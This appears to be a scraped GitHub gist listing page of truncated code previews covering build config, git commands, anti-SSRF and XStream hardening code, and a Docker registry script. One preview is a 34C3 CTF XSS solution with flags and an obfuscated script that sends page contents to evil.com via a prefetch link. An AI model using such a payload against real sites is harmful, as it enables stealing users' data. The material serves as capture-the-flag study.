This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<build> | |
<sourceDirectory>${project.basedir}/src/main/lombok/</sourceDirectory> | |
<plugins> | |
<plugin> | |
<groupId>org.projectlombok</groupId> | |
<artifactId>lombok-maven-plugin</artifactId> | |
<version>1.18.20.0</version> | |
<executions> | |
<execution> | |
<id>delombok</id> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// git 拉取指定commit | |
// git 版本 2.27 | |
> git init | |
> git remote add origin {git_address} | |
> git -c protocol.version=2 fetch --depth=1 origin {commit_id} | |
> git reset --hard FETCH_HEAD |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
include('vendor/autoload.php'); | |
use fin1te\SafeCurl\SafeCurl; | |
use fin1te\SafeCurl\Options; | |
use fin1te\SafeCurl\Exception; | |
try { | |
$url = 'https://mp.weixin.qq.com/s/uYF7bE9Ob-0hfFVNO7Pcpw'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import org.springframework.beans.factory.annotation.Autowired; | |
import org.springframework.web.bind.annotation.RequestMapping; | |
import org.springframework.web.bind.annotation.RequestMethod; | |
import org.springframework.web.bind.annotation.RequestParam; | |
import org.springframework.web.bind.annotation.RestController; | |
import org.springframework.web.context.WebApplicationContext; | |
import org.springframework.web.method.HandlerMethod; | |
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition; | |
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition; | |
import org.springframework.web.servlet.mvc.method.RequestMappingInfo; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zipfile | |
def extractDependencyFromJar(jar_file: str) -> list: | |
""" | |
获取jar包中maven管理的依赖库 | |
:param jar_file: jar绝对路径 | |
:return: list 依赖列表 [ groupId:artifactId:version ...] | |
""" | |
dependency_list = [] | |
zfile = zipfile.ZipFile(jar_file) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class AntiSSRF | |
{ | |
private $timeout; | |
private $limit; | |
function __construct() | |
{ | |
$this->timeout = 5; //默认5s超时 | |
$this->limit = 3; //默认跳转3次 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding:utf-8 | |
import requests | |
import json | |
import sys | |
requests.packages.urllib3.disable_warnings() | |
headers = { | |
"Accept": "application/vnd.docker.distribution.manifest.v2+json" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
XSS vector: | |
<link id=foo rel=import href=/flag(1|2)> | |
<script src="/feed?type=jsonp&cb=payload"></script> | |
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u --> | |
<script> | |
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`, | |
</script> | |
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public static <T> T readValue(String content, Class<T> valueType) { | |
XStream xstream = new XStream(); | |
// clean rules | |
xstream.addPermission(NoTypePermission.None); | |
// only allow Target class type | |
xstream.allowTypeHierarchy(valueType.class); | |
return (T) xstream.fromXML(content); |
NewerOlder